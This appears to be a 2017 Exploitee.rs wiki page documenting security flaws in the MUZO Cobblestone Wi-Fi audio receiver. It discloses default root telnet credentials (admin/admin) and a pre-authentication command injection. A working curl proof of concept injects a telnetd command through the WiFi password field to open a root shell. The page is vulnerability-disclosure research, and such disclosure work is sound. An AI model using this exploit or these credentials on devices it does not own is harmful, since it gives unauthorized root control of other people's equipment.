MUZO Cobblestone

From Exploitee.rs
Revision as of 01:04, 11 August 2017 by CJ (talk | contribs) (→‎Pre Auth Root Command Injection)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigationJump to search

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

MUZO.JPG

MUZO Cobblestone

"MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices."

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the MUZO Cobblestone at Amazon

Telnet Default Credentials

The device permits logins with root permissions with the username of admin and password of admin

Pre Authorization Root Command Injection

A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.

Proof of Concept:

curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed